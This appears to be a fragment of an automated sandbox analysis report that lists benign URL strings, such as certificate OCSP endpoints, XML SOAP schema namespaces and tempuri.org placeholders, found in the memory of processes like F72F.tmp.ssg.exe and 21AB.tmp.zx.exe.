              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
              Source: explorer.exe, 00000005.00000000.1420653874.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2681284481.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284390112.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: 21AB.tmp.zx.exe, 0000000D.00000002.1631752112.00007FFBAAE7D000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
              Source: explorer.exe, 00000005.00000000.1419270768.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2679420164.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2674228477.0000000002C80000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002996000.00000004.00000800.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/:hardwares.
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
